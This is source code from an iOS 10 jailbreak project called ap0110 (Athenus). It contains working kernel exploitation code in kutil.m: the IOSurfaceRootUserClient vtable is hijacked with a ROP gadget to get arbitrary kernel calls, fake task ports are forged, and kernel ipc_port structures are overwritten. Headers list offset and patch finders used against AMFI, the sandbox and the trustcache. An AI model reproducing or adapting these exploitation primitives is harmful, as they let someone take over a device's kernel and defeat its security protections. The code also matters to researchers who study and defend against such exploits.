46 | #define wk64(where, what) kwrite_uint64(where, what)
47 | #if __arm64__
48 | #define wkptr(where, what) wk64(where, what)
49 | #else
50 | #define wkptr(where, what) wk32(where, what)
51 | #endif
52 |
53 | void kfree(mach_vm_address_t address, vm_size_t size);
54 | kptr_t kalloc(vm_size_t size);
55 |
56 | kptr_t kmem_alloc(uint64_t size);
57 | bool kmem_free(mach_vm_address_t kaddr, vm_size_t size);
58 |
59 | uintptr_t find_port(mach_port_name_t port, kptr_t task_self);
60 |
61 | kptr_t make_fake_task(kptr_t vm_map);
62 | bool rkbuffer(kptr_t kaddr, void* buffer, size_t length);
63 | bool wkbuffer(kptr_t kaddr, void* buffer, size_t length);
64 |
65 | kern_return_t mach_vm_remap(
66 | mach_port_name_t target,
67 | mach_vm_address_t *address,
68 | mach_vm_size_t size,
69 | mach_vm_offset_t mask,
70 | int flags,
71 | mach_port_name_t src_task,
72 | mach_vm_address_t src_address,
73 | boolean_t copy,
74 | vm_prot_t *cur_protection,
75 | vm_prot_t *max_protection,
76 | vm_inherit_t inheritance);
77 |
78 | __END_DECLS
79 |
80 | #endif /* kernel_memory_h */
81 |
--------------------------------------------------------------------------------
/Athenus/kutil.h:
--------------------------------------------------------------------------------
1 | //
2 | // kutil.h
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/7/25.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef kexec_h
10 | #define kexec_h
11 |
12 | __BEGIN_DECLS
13 |
14 | #include "sock_port_exploit.h"
15 |
16 | struct port_kernel_context {
17 | uint32_t io_bits;
18 | uint32_t io_references;
19 | uint32_t ip_srights;
20 | uint32_t is_table_bits;
21 | uintptr_t ip_receiver;
22 | uintptr_t ip_kobject;
23 | //kport_t port;
24 | };
25 |
26 | kptr_t proc_struct_addr(void);
27 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port);
28 | kptr_t make_fake_task(kptr_t vm_map);
29 | void free_fake_task(kptr_t fake_task);
30 | bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr, struct port_kernel_context *save);
31 | void restore_port(mach_port_t port, struct port_kernel_context *save);
32 |
33 | bool init_kexec(void);
34 | void term_kexec(void);
35 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6);
36 |
37 | kptr_t proc_struct_addr(void);
38 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port);
39 |
40 |
41 | __END_DECLS
42 |
43 | #endif /* kexec_h */
44 |
--------------------------------------------------------------------------------
/Athenus/kutil.m:
--------------------------------------------------------------------------------
1 | //
2 | // kutil.m
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/7/25.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 | //
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include "common.h"
15 | #include "offsets.h"
16 | #import
17 | #include "kutil.h"
18 | #include "jailbreak.h"
19 | #include "kernel_memory.h"
20 | #include "sock_port_exploit.h"
21 | #include
22 |
23 | // Only support arm64 devices, not arm64e devices.
24 |
25 | static mach_port_t prepare_user_client() {
26 | kern_return_t err;
27 | mach_port_t user_client;
28 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
29 |
30 | if (service == 0) {
31 | LOG("unable to find service");
32 | exit(EXIT_FAILURE);
33 | }
34 |
35 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
36 | if (err != KERN_SUCCESS) {
37 | LOG("unable to get user client connection");
38 | exit(EXIT_FAILURE);
39 | }
40 |
41 | return user_client;
42 | }
43 |
44 | static mach_port_t user_client;
45 | static kptr_t IOSurfaceRootUserClient_port;
46 | static kptr_t IOSurfaceRootUserClient_addr;
47 | static kptr_t fake_vtable;
48 | static kptr_t fake_client;
49 | static const int fake_kalloc_size = 0x1000;
50 |
51 | static pthread_mutex_t kexec_lock;
52 |
53 | bool init_kexec() {
54 | puts("kexec: preparing user client");
55 | user_client = prepare_user_client();
56 | if (!MACH_PORT_VALID(user_client)) {
57 | return false;
58 | }
59 | puts("kexec: getting user client port address");
60 | IOSurfaceRootUserClient_port = get_address_of_port(proc_struct_addr(), user_client);
61 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) {
62 | return false;
63 | }
64 | puts("kexec: getting user client port ptr");
65 | IOSurfaceRootUserClient_addr = kread_uintptr(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
66 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) {
67 | return false;
68 | }
69 | puts("kexec: getting vtab ptr");
70 | kptr_t IOSurfaceRootUserClient_vtab = kread_uintptr(IOSurfaceRootUserClient_addr);
71 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) {
72 | return false;
73 | }
74 | puts("kexec: allocating fake vtable");
75 | fake_vtable = kmem_alloc(fake_kalloc_size);
76 | if (!KERN_POINTER_VALID(fake_vtable)) {
77 | return false;
78 | }
79 |
80 | size_t buffer_size = fake_kalloc_size;
81 | void *buffer = malloc(fake_kalloc_size);
82 | puts("kexec: copying vtable");
83 | kread(IOSurfaceRootUserClient_vtab, buffer, buffer_size);
84 | kwrite(fake_vtable, buffer, buffer_size);
85 | puts("kexec: allocating fake client");
86 | fake_client = kmem_alloc(fake_kalloc_size);
87 | if (!KERN_POINTER_VALID(fake_client)) {
88 | return false;
89 | }
90 | puts("kexec: copying fake client");
91 | kread(IOSurfaceRootUserClient_addr, buffer, 0x50);
92 | kwrite(fake_client, buffer, 0x50);
93 | puts("kexec: overwriting user client");
94 | kwrite_uintptr(fake_client, fake_vtable);
95 | kwrite_uintptr(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), fake_client);
96 |
97 | // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
98 | puts("kexec: setting ROP");
99 | #if __arm64__
100 | kwrite_uint64(fake_vtable + 8 * 0xB7, get_add_x0_x0_0x40_ret());
101 | #else
102 | kwrite_uint32(fake_vtable + 4 * get_vtab_get_external_trap_for_index(), get_add_x0_x0_0x40_ret() + 1);
103 | #endif
104 | pthread_mutex_init(&kexec_lock, NULL);
105 | free(buffer);
106 | return true;
107 | }
108 |
109 | void term_kexec() {
110 | kwrite_uint64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), IOSurfaceRootUserClient_addr);
111 | kmem_free(fake_vtable, fake_kalloc_size);
112 | kmem_free(fake_client, fake_kalloc_size);
113 | IOServiceClose(user_client);
114 | pthread_mutex_destroy(&kexec_lock);
115 | }
116 |
117 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6) {
118 | kptr_t returnval = 0;
119 | pthread_mutex_lock(&kexec_lock);
120 | const uintptr_t offset = 0x40;
121 | kptr_t off0 = kread_uintptr(fake_client + offset);
122 | kptr_t off1 = kread_uintptr(fake_client + (offset + sizeof(kptr_t)));
123 | #if !__arm64__
124 | kptr_t off2 = kread_uintptr(fake_client + (offset + 2 * sizeof(kptr_t)));
125 | #endif
126 | kwrite_uintptr(fake_client + offset, x0);
127 | kwrite_uintptr(fake_client + (offset + sizeof(kptr_t)), ptr);
128 | #if !__arm64__
129 | kwrite_uintptr(fake_client + (offset + 2 * sizeof(kptr_t)), 0);
130 | //printf("kexec "ADDR" "ADDR" "ADDR" "ADDR" "ADDR" "ADDR" "ADDR" "ADDR"\n", ptr, x0, x1, x2, x3, x4, x5, x6);
131 | returnval = IOConnectTrap6(user_client, fake_client + offset, x1, x2, x3, x4, x5, x6);
132 | #else
133 | returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
134 | #endif
135 | kwrite_uintptr(fake_client + offset, off0);
136 | kwrite_uintptr(fake_client + (offset + sizeof(kptr_t)), off1);
137 | #if !__arm64__
138 | kwrite_uintptr(fake_client + (offset + 2 * sizeof(kptr_t)), off2);
139 | #endif
140 | pthread_mutex_unlock(&kexec_lock);
141 | return returnval;
142 | }
143 |
144 | #define SafeFreeNULL(X) free(X)
145 | #define _assert(X) if (!(X)) {printf("assert failed\n");;goto out;}
146 | #if __arm64__
147 | static kptr_t
148 | zm_fix_addr(kptr_t addr) {
149 | typedef struct {
150 | uintptr_t prev;
151 | uintptr_t next;
152 | uintptr_t start;
153 | uintptr_t end;
154 | } kmap_hdr_t;
155 | kptr_t zm_fixed_addr = 0;
156 | kmap_hdr_t *zm_hdr = NULL;
157 | kptr_t const symbol = get_zone_map_ref();//getoffset(zone_map_ref);
158 | _assert(KERN_POINTER_VALID(symbol));
159 | zm_hdr = malloc(sizeof(kmap_hdr_t));
160 | _assert(zm_hdr != NULL);
161 | kptr_t const zone_map = kread_uintptr(symbol);
162 | _assert(KERN_POINTER_VALID(zone_map));
163 | _assert(rkbuffer(zone_map + 0x10, zm_hdr, sizeof(kmap_hdr_t)));
164 | _assert(zm_hdr->end - zm_hdr->start <= 0x100000000);
165 | kptr_t const zm_tmp = (zm_hdr->start & 0xffffffff00000000) | ((addr) & 0xffffffff);
166 | zm_fixed_addr = zm_tmp < zm_hdr->start ? zm_tmp + 0x100000000 : zm_tmp;
167 | out:;
168 | SafeFreeNULL(zm_hdr);
169 | return zm_fixed_addr;
170 | }
171 |
172 | kptr_t IOMalloc(vm_size_t size) {
173 | kptr_t ret = 0;
174 | kptr_t const function = get_IOMalloc();//getoffset(IOMalloc);
175 | _assert(KERN_POINTER_VALID(function));
176 | ret = kexec(function, (kptr_t)size, 0, 0, 0, 0, 0, 0);
177 | if (ret != 0) ret = zm_fix_addr(ret);
178 | out:;
179 | return ret;
180 | }
181 | #endif
182 |
183 | void IOFree(kptr_t address, vm_size_t size) {
184 | _assert(KERN_POINTER_VALID(address));
185 | _assert(size > 0);
186 | kptr_t const function = get_IOFree();//getoffset(IOFree);
187 | _assert(KERN_POINTER_VALID(function));
188 | kexec(function, address, (kptr_t)size, 0, 0, 0, 0, 0);
189 | out:;
190 | }
191 |
192 | kptr_t make_fake_task(kptr_t vm_map) {
193 | kptr_t ret = 0;
194 | kptr_t fake_task_kaddr = 0;
195 | void *fake_task = NULL;
196 | if (!KERN_POINTER_VALID(vm_map)) {
197 | goto out;
198 | }
199 | fake_task_kaddr = kmem_alloc(fake_task_size);
200 | if (!KERN_POINTER_VALID(fake_task_kaddr)) {
201 | goto out;
202 | }
203 | fake_task = malloc(fake_task_size);
204 | if (fake_task == NULL) {
205 | goto out;
206 | }
207 | memset(fake_task, 0, fake_task_size);
208 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d;
209 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1;
210 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map;
211 | *(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22;
212 | _assert(wkbuffer(fake_task_kaddr, fake_task, fake_task_size));
213 | ret = fake_task_kaddr;
214 | out:;
215 | if (!KERN_POINTER_VALID(ret) && KERN_POINTER_VALID(fake_task_kaddr)) {
216 | kmem_free(fake_task_kaddr, fake_task_size);
217 | }
218 | free(fake_task);
219 | return ret;
220 | }
221 |
222 | void
223 | free_fake_task(kptr_t fake_task) {
224 | kmem_free(fake_task, fake_task_size);
225 | }
226 |
227 | #define find_port(port, disposition) ( get_address_of_port(proc_struct_addr(), port))
228 |
229 | kptr_t ipc_space_kernel() {
230 | kptr_t ret = 0;
231 | kptr_t const task_self = task_self_addr();
232 | _assert(KERN_POINTER_VALID(task_self));
233 | kptr_t const ipc_space = kread_uintptr(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));
234 | _assert(KERN_POINTER_VALID(ipc_space));
235 | ret = ipc_space;
236 | out:;
237 | return ret;
238 | }
239 |
240 | #define IE_BITS_SEND (1<<16)
241 | #define IE_BITS_RECEIVE (1<<17)
242 | #define IO_BITS_ACTIVE 0x80000000
243 |
244 | #define IKOT_TASK 2
245 |
246 | static bool
247 | convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr, struct port_kernel_context *save) {
248 | bool ret = false;
249 | _assert(MACH_PORT_VALID(port));
250 | _assert(KERN_POINTER_VALID(space));
251 | _assert(KERN_POINTER_VALID(task_kaddr));
252 | kptr_t const port_kaddr = get_address_of_port(proc_struct_addr(), port);
253 | if (save != NULL) {
254 | //kread(port_kaddr, (void*)&save->port, sizeof(save->port));
255 | save->io_bits = kread_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
256 | save->io_references = kread_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES));
257 | save->ip_srights = kread_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS));
258 | save->ip_receiver = kread_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));
259 | save->ip_kobject = kread_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
260 | }
261 | _assert(KERN_POINTER_VALID(port_kaddr));
262 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_BITS_ACTIVE | IKOT_TASK));
263 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), 0xf00d));
264 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), 0xf00d));
265 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), space));
266 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), task_kaddr));
267 | kptr_t const task_port_addr = task_self_addr();
268 | _assert(KERN_POINTER_VALID(task_port_addr));
269 | kptr_t const task_addr = kread_uintptr(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
270 | _assert(KERN_POINTER_VALID(task_addr));
271 | kptr_t const itk_space = kread_uintptr(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
272 | _assert(KERN_POINTER_VALID(itk_space));
273 | kptr_t const is_table = kread_uintptr(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));
274 | _assert(KERN_POINTER_VALID(is_table));
275 | uint32_t bits = kread_uint32(is_table + (MACH_PORT_INDEX(port) * koffset(KSTRUCT_SIZE_IPC_ENTRY)) + koffset(KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS));
276 | bits &= (~IE_BITS_RECEIVE);
277 | bits |= IE_BITS_SEND;
278 | _assert(kwrite_uint32(is_table + (MACH_PORT_INDEX(port) * koffset(KSTRUCT_SIZE_IPC_ENTRY)) + koffset(KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS), bits));
279 | ret = true;
280 | out:;
281 | return ret;
282 | }
283 |
284 | void
285 | restore_port(mach_port_t port, struct port_kernel_context *save) {
286 | kptr_t const port_kaddr = get_address_of_port(proc_struct_addr(), port);
287 |
288 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), save->io_bits));
289 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), save->io_references));
290 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), save->ip_srights));
291 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), save->ip_receiver));
292 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), save->ip_kobject));
293 |
294 | out:;
295 | }
296 |
297 | bool
298 | make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr, struct port_kernel_context *save) {
299 | bool ret = false;
300 | _assert(MACH_PORT_VALID(port));
301 | _assert(KERN_POINTER_VALID(task_kaddr));
302 | kptr_t const space = ipc_space_kernel();
303 | _assert(KERN_POINTER_VALID(space));
304 | _assert(convert_port_to_task_port(port, space, task_kaddr, save));
305 | ret = true;
306 | out:;
307 | return ret;
308 | }
309 |
310 | extern kptr_t self_proc_addr;
311 |
312 | kptr_t proc_struct_addr() {
313 | return self_proc_addr;
314 | }
315 |
316 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port) {
317 | kptr_t task_addr = 0;
318 | kread(proc + koffset(KSTRUCT_OFFSET_PROC_TASK), &task_addr, sizeof(task_addr));
319 | if (!KERN_POINTER_VALID(task_addr)) {
320 | return 0;
321 | }
322 | kptr_t itk_space = 0;
323 | kread(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE), &itk_space, sizeof(task_addr));
324 | if (!KERN_POINTER_VALID(itk_space)) {
325 | return 0;
326 | }
327 | kptr_t is_table = 0;
328 | kread(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE), &is_table, sizeof(is_table));
329 | if (!KERN_POINTER_VALID(is_table)) {
330 | return 0;
331 | }
332 | uint32_t port_index = port >> 8;
333 | const int sizeof_ipc_entry_t = koffset(KSTRUCT_SIZE_IPC_ENTRY);
334 |
335 | kptr_t port_addr = 0;
336 | kread(is_table + (port_index * sizeof_ipc_entry_t), &port_addr, sizeof(port_addr));
337 | if (!KERN_POINTER_VALID(port_addr)) {
338 | return 0;
339 | }
340 | return port_addr;
341 | }
342 |
--------------------------------------------------------------------------------
/Athenus/libs/libimg4tool.a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/libs/libimg4tool.a
--------------------------------------------------------------------------------
/Athenus/libs/libplist++.a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/libs/libplist++.a
--------------------------------------------------------------------------------
/Athenus/libs/libplist.a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/libs/libplist.a
--------------------------------------------------------------------------------
/Athenus/main.m:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #import
17 | #import "AppDelegate.h"
18 | #include
19 |
20 | int main(int argc, char * argv[]) {
21 | // dsystem = dlsym(RTLD_DEFAULT,"system");
22 | @autoreleasepool {
23 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); // important!!!
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Athenus/offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef OFFSETS_H
2 | #define OFFSETS_H
3 |
4 | #include "common.h" // kptr_t
5 |
6 | __BEGIN_DECLS
7 |
8 | typedef struct {
9 | kptr_t base;
10 | // Structure offsets
11 | kptr_t sizeof_task;
12 | //kptr_t task_itk_self;
13 | //kptr_t task_itk_registered;
14 | kptr_t task_bsd_info;
15 | kptr_t proc_ucred;
16 | #ifdef __LP64__
17 | //kptr_t vm_map_hdr;
18 | #endif
19 | //kptr_t ipc_space_is_task;
20 | //kptr_t realhost_special;
21 | //kptr_t iouserclient_ipc;
22 | //kptr_t vtab_get_retain_count;
23 | //kptr_t vtab_get_external_trap_for_index;
24 | // Data
25 | kptr_t zone_map;
26 | kptr_t kernel_map;
27 | kptr_t kernel_task;
28 | kptr_t realhost;
29 | // Code
30 | //kptr_t copyin;
31 | //kptr_t copyout;
32 | //kptr_t chgproccnt;
33 | //kptr_t kauth_cred_ref;
34 | //kptr_t ipc_port_alloc_special;
35 | //kptr_t ipc_kobject_set;
36 | //kptr_t ipc_port_make_send;
37 | //kptr_t osserializer_serialize;
38 | #ifdef __LP64__
39 | //kptr_t rop_ldr_x0_x0_0x10;
40 | #else
41 | //kptr_t rop_ldr_r0_r0_0xc;
42 | #endif
43 | } offsets_t;
44 |
45 | offsets_t* get_offsets(void*);
46 |
47 | enum kstruct_offset {
48 | /* struct task */
49 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
50 | KSTRUCT_OFFSET_TASK_REF_COUNT,
51 | KSTRUCT_OFFSET_TASK_ACTIVE,
52 | KSTRUCT_OFFSET_TASK_VM_MAP,
53 | KSTRUCT_OFFSET_TASK_NEXT,
54 | KSTRUCT_OFFSET_TASK_PREV,
55 | KSTRUCT_OFFSET_TASK_ITK_SELF,
56 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
57 | KSTRUCT_OFFSET_TASK_BSD_INFO,
58 |
59 | /* struct ipc_port */
60 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
61 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
62 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
63 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
64 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
65 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
66 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
67 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
68 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
69 |
70 | /* struct proc */
71 | KSTRUCT_OFFSET_PROC_PID,
72 | KSTRUCT_OFFSET_PROC_P_FD,
73 | KSTRUCT_OFFSET_PROC_TASK,
74 |
75 | /* struct filedesc */
76 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
77 |
78 | /* struct fileproc */
79 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
80 |
81 | /* struct fileglob */
82 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
83 |
84 | /* struct socket */
85 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
86 |
87 | /* struct pipe */
88 | KSTRUCT_OFFSET_PIPE_BUFFER,
89 |
90 | /* struct ipc_space */
91 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
92 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
93 |
94 | /* struct host */
95 | KSTRUCT_OFFSET_HOST_SPECIAL,
96 |
97 | KFREE_ADDR_OFFSET,
98 | KSTRUCT_SIZE_IPC_ENTRY,
99 | KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,
100 | };
101 |
102 | struct cpu_cache_data {
103 | uint32_t mmu_i_cline;
104 | uint32_t mmu_csize;
105 | uint32_t mmu_cline;
106 | uint32_t mmu_nway;
107 | uint32_t mmu_i7set;
108 | uint32_t mmu_i7way;
109 | uint32_t mmu_i9way;
110 | uint32_t mmu_sway;
111 | uint32_t mmu_nset;
112 | uint32_t l2_csize;
113 | uint32_t l2_cline;
114 | uint32_t l2_nway;
115 | uint32_t l2_i7set;
116 | uint32_t l2_i7way;
117 | uint32_t l2_i9way;
118 | uint32_t l2_sway;
119 | uint32_t l2_nset;
120 | };
121 |
122 | int koffset(enum kstruct_offset offset);
123 | void offsets_init(void);
124 |
125 | extern uint32_t create_outsize;
126 | extern size_t fake_task_size;
127 |
128 | extern size_t get_add_x0_x0_0x40_ret(void);
129 | extern size_t get_IOMalloc(void);
130 | extern size_t get_zone_map_ref(void);
131 | extern size_t get_IOFree(void);
132 | extern size_t get_vtab_get_external_trap_for_index(void);
133 | extern struct cpu_cache_data get_cache_data(void);
134 |
135 | __END_DECLS
136 |
137 | #endif
138 |
--------------------------------------------------------------------------------
/Athenus/offsets.mm:
--------------------------------------------------------------------------------
1 | #include
2 | #include // strcmp, strerror
3 | #include // uname
4 |
5 | #include "common.h" // LOG, kptr_t
6 | #include "offsets.h"
7 | #include
8 |
9 | static offsets_t offs;
10 | static bool didInit = false;
11 | size_t fake_task_size = 0;
12 |
13 | extern "C" offsets_t* get_offsets(void *fi_) {
14 | offsetfinder *fi = static_cast(fi_);
15 | if (!didInit){
16 | offs.base = (kptr_t)fi->linker_base();
17 |
18 | offs.sizeof_task = (kptr_t)fi->find_sizeof_task();
19 | //offs.task_itk_self = (kptr_t)fi->find_task_itk_self();
20 | //offs.task_itk_registered = (kptr_t)fi->find_task_itk_registered();
21 | offs.task_bsd_info = koffset(KSTRUCT_OFFSET_TASK_BSD_INFO);
22 | //(kptr_t)fi->find_task_bsd_info();
23 | offs.proc_ucred = (kptr_t)fi->find_proc_ucred();
24 | //offs.vm_map_hdr = (kptr_t)fi->find_vm_map_hdr();
25 | //offs.ipc_space_is_task = (kptr_t)fi->find_ipc_space_is_task();
26 | //offs.realhost_special = koffset(KSTRUCT_OFFSET_HOST_SPECIAL);//0x10;
27 | //offs.iouserclient_ipc = (kptr_t)fi->find_iouserclient_ipc();
28 | //offs.vtab_get_retain_count = (kptr_t)fi->find_vtab_get_retain_count();
29 | //offs.vtab_get_external_trap_for_index = (kptr_t)fi->find_vtab_get_external_trap_for_index();
30 |
31 | offs.zone_map = (kptr_t)fi->find_zone_map();
32 | offs.kernel_map = (kptr_t)fi->find_kernel_map();
33 | offs.kernel_task = (kptr_t)fi->find_kernel_task();
34 | offs.realhost = (kptr_t)fi->find_realhost();
35 | fake_task_size = round_page_kernel(offs.sizeof_task);
36 | printf("Task size: %zu, fake task size: %zd\n", (size_t)offs.sizeof_task, fake_task_size);
37 |
38 | //offs.copyin = (kptr_t)fi->find_copyin();
39 | //offs.copyout = (kptr_t)fi->find_copyout();
40 | //offs.chgproccnt = (kptr_t)fi->find_chgproccnt();
41 | //offs.kauth_cred_ref = (kptr_t)fi->find_kauth_cred_ref();
42 | //offs.ipc_port_alloc_special = (kptr_t)fi->find_ipc_port_alloc_special();
43 | //offs.ipc_kobject_set = (kptr_t)fi->find_ipc_kobject_set();
44 | //offs.ipc_port_make_send = (kptr_t)fi->find_ipc_port_make_send();
45 | //offs.osserializer_serialize = (kptr_t)fi->find_osserializer_serialize();
46 | //offs.rop_ldr_x0_x0_0x10 = (kptr_t)fi->find_rop_ldr_x0_x0_0x10();
47 | didInit = true;
48 | }
49 | return &offs;
50 | }
51 |
--------------------------------------------------------------------------------
/Athenus/patchfinder64.h:
--------------------------------------------------------------------------------
1 | #ifndef PATCHFINDER64_H_
2 | #define PATCHFINDER64_H_
3 |
4 | #include
5 | #include
6 | #include
7 |
8 | #if __arm64__
9 |
10 | extern bool auth_ptrs;
11 | extern bool monolithic_kernel;
12 |
13 | int init_kernel(size_t (*kread)(uint64_t, void *, size_t), uint64_t kernel_base, const char *filename);
14 | void term_kernel(void);
15 |
16 | enum text_bases {
17 | text_xnucore_base = 0,
18 | text_prelink_base,
19 | text_ppl_base
20 | };
21 |
22 | enum string_bases {
23 | string_base_cstring = 0,
24 | string_base_pstring,
25 | string_base_oslstring,
26 | string_base_data,
27 | string_base_const
28 | };
29 |
30 | uint64_t find_register_value(uint64_t where, int reg);
31 | uint64_t find_reference(uint64_t to, int n, enum text_bases base);
32 | uint64_t find_strref(const char *string, int n, enum string_bases string_base, bool full_match, bool ppl_base);
33 | uint64_t find_gPhysBase(void);
34 | uint64_t find_kernel_pmap(void);
35 | uint64_t find_amfiret(void);
36 | uint64_t find_ret_0(void);
37 | uint64_t find_amfi_memcmpstub(void);
38 | uint64_t find_sbops(void);
39 | uint64_t find_lwvm_mapio_patch(void);
40 | uint64_t find_lwvm_mapio_newj(void);
41 |
42 | uint64_t find_entry(void);
43 | const unsigned char *find_mh(void);
44 |
45 | uint64_t find_cpacr_write(void);
46 | uint64_t find_str(const char *string);
47 | uint64_t find_amfiops(void);
48 | uint64_t find_sysbootnonce(void);
49 | uint64_t find_trustcache(void);
50 | uint64_t find_amficache(void);
51 | uint64_t find_allproc(void);
52 | uint64_t find_vfs_context_current(void);
53 | uint64_t find_vnode_lookup(void);
54 | uint64_t find_vnode_put(void);
55 | uint64_t find_vnode_getfromfd(void);
56 | uint64_t find_vnode_getattr(void);
57 | uint64_t find_SHA1Init(void);
58 | uint64_t find_SHA1Update(void);
59 | uint64_t find_SHA1Final(void);
60 | uint64_t find_csblob_entitlements_dictionary_set(void);
61 | uint64_t find_kernel_task(void);
62 | uint64_t find_kernproc(void);
63 | uint64_t find_vnode_recycle(void);
64 | uint64_t find_lck_mtx_lock(void);
65 | uint64_t find_lck_mtx_unlock(void);
66 | uint64_t find_strlen(void);
67 | uint64_t find_add_x0_x0_0x40_ret(void);
68 | uint64_t find_boottime(void);
69 | uint64_t find_zone_map_ref(void);
70 | uint64_t find_OSBoolean_True(void);
71 | uint64_t find_osunserializexml(void);
72 | uint64_t find_smalloc(void);
73 | uint64_t find_shenanigans(void);
74 | uint64_t find_move_snapshot_to_purgatory(void);
75 | uint64_t find_chgproccnt(void);
76 | uint64_t find_kauth_cred_ref(void);
77 | uint64_t find_apfs_jhash_getvnode(void);
78 | uint64_t find_fs_lookup_snapshot_metadata_by_name_and_return_name(void);
